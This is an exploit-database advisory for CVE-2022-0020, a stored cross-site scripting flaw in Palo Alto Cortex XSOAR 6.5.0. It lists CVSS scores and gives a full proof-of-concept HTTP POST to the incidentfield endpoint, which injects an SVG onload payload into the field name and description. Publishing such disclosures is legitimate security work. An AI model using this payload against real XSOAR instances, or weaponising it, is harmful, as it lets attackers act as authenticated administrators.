Palo Alto Cortex XSOAR 6.5.0 Cross Site Scripting

2023.04.10
Credit: omurugur
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS) # Exploit Author: omurugur # Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020 # Version: 6.5.0 - 6.2.0 - 6.1.0 # Tested on: [relevant os] # CVE : CVE-2022-0020 # Author Web: https://www.justsecnow.com # Author Social: @omurugurrr A stored cross-site scripting (XSS) vulnerability in Palo Alto Network Cortex XSOAR web interface enables an authenticated network-based attacker to store a persistent javascript payload that will perform arbitrary actions in the Cortex XSOAR web interface on behalf of authenticated administrators who encounter the payload during normal operations. POST /acc_UAB(MAY)/incidentfield HTTP/1.1 Host: x.x.x.x Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x; isTimLicense=false User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://x.x.x.x/acc_UAB(MAY) Content-Type: application/json X-Xsrf-Token: Api_truncate_results: true Origin: https://x.x.x.x Content-Length: 373 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close {"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false} Regards, Omur UGUR


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top